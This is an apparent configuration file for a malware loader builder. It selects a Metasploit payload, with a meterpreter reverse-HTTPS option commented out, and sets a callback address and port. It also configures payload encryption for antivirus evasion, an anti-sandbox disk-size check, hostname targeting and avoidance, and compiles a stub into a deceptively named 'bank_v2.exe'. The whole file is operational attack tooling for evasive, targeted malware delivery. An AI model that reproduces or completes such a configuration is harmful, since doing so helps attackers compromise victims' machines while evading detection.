[Payload]

# metasploit payloads, use "msfvenom -l payloads" to list all payloads
#name=windows/x64/meterpreter/reverse_https
name=windows/x64/messagebox
lhost=37.114.41.46
lport=443


# xor, dictionary (not yet aes)
encryption_method=dictionary

# unique WORD, need to implement simple syntax check
# rand -> random between 0x1111 and 0xffff
encryption_key=rand

[Anti-Analysis]
# If disk size is less than <value>, the payload will not be executed
disk_size=120

# if both not set : payload will trigger
# if target is ste : payload will trigger onyly if target match (prefix)
# if avoid is set : payload will trigger only none of the avoid match (prefix)
# if both set : payload will trigger only if target match (prefix) and avoid not match (prefix) 
target_hostname=
#C82PP24177
# correct format is
# avoid_hostname=prefix1
# avoid_hostname=prefix1,prefix2,prefix3
avoid_hostname=

[Stub]
filename=loader.c
ror_value=19
output_file=bank_v2.exe

